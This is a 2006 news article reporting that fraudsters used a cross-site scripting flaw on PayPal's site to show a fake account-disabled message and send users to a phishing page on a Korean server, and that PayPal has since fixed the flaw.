The Inquirer-Home

PayPal fixes fatal flaw

Hackers placed fake URL on its site
Mon Jun 19 2006, 10:24
ONLINE TRANSACTION outfit, PayPal has found a phony URL on its site that was being used by fraudsters to steal credit card numbers and other personal information belonging to PayPal users.

The issue was publicised by Netcraft, and PayPal swiftly fixed it. However it is unclear how many people lost personal details because of it.

The scam involved tricking users into accessing a URL hosted on the real PayPal web site. This URL used SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate was presented to confirm that the site does indeed belong to PayPal. But the content on the page was been modified by the fraudsters via a cross-site scripting technique (XSS).

When the victim visited the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." They are then redirected to an external server in Korea, which presents a fake PayPal Member log-In page and anything the punter taps in is given to the hackers.

Punters could be forgiven for falling for the scheme because they would have had in their possession a correct PayPal certificate and domain name.

PayPal has had a few words with the Korean ISP and is getting the server shut down. However it says it has dealt with the problem on its site.

More here. µ


Share this:

blog comments powered by Disqus
Subscribe to INQ newsletters

Sign up for INQbot – a weekly roundup of the best from the INQ

INQ Poll

Heartbleed bug discovered in OpenSSL

Have you reacted to Heartbleed?